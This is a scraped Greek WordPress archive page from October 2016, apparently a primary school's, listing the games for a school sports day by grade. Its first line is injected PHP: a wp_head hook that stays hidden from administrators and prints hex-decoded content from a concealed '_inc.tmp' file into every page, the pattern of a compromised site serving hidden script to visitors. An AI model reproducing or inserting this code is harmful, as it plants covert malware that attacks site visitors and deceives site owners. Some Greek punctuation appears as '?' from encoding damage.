if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Οκτώβριος, 2016 |

Monthly Archives: Οκτώβριος 2016

3η Πανελλήνια Ημέρα Σχολικού Αθλητισμού

ΔΕΥΤΕΡΑ 3/10/2016

ΠΑΝΕΛΛΗΝΙΑ ΗΜΕΡΑ ΣΧΟΛΙΚΟΥ ΑΘΛΗΤΙΣΜΟΥ

ΠΡΟΓΡΑΜΜΑ ΠΑΙΧΝΙΔΙΩΝ

Η κίνηση είναι το πρώτο μέσο με το οποίο ο άνθρωπος προσεγγίζει, ερευνά και γνωρίζει το περιβάλλον του. Αποτελεί τη βάση στην οποία αναπτύσσονται όλοι οι υπόλοιποι τομείς της ζωής του. Η κίνηση ως μέσο εξερεύνησης του φυσικού και κοινωνικού περιβάλλοντος, συντελεί στην απόκτηση γνώσεων και βοηθάει στην κοινωνική αλληλεπίδραση.

Τα παιδιά του σχολείου μας θα χαρούν μαζί μας παίζοντας παιχνίδια προσαρμοσμένα στις δυνατότητες τις ηλικίας τους, αλλά και αθλήματα που παίζουν οι ?μεγάλοι? με κανονισμούς διαφοροποιημένους αλλά και πραγματικούς. Επίσης, θα ασχοληθούν και με αθλήματα που συναντάει κανείς σε παραολυμπιακούς αγώνες από άτομα με κινητικά προβλήματα.

8:30 Μεταφορά μαθητών στο γήπεδο Λεωνιδίου

9:00 ? 10:00

Α΄ Δημοτικού

1. Σκυταλοδρομία: παραδοσιακό παιχνίδι από το Χονγκ ? Κονγκ ?Σπέρνω ? θερίζω φασόλια?
  2. Κυνηγητόμπαλα

Β΄ Δημοτικού

1. Μαντηλάκι
  2. Σκυταλοδρομία συνεργασίας : ?Σπέρνω ? θερίζω φασόλια?
  3. Ψείρες

10:00 ? 11:00

Γ΄ Δημοτικού

1. Σκυταλοδρομία: μεταφορά σπόρων από νησί σε νησί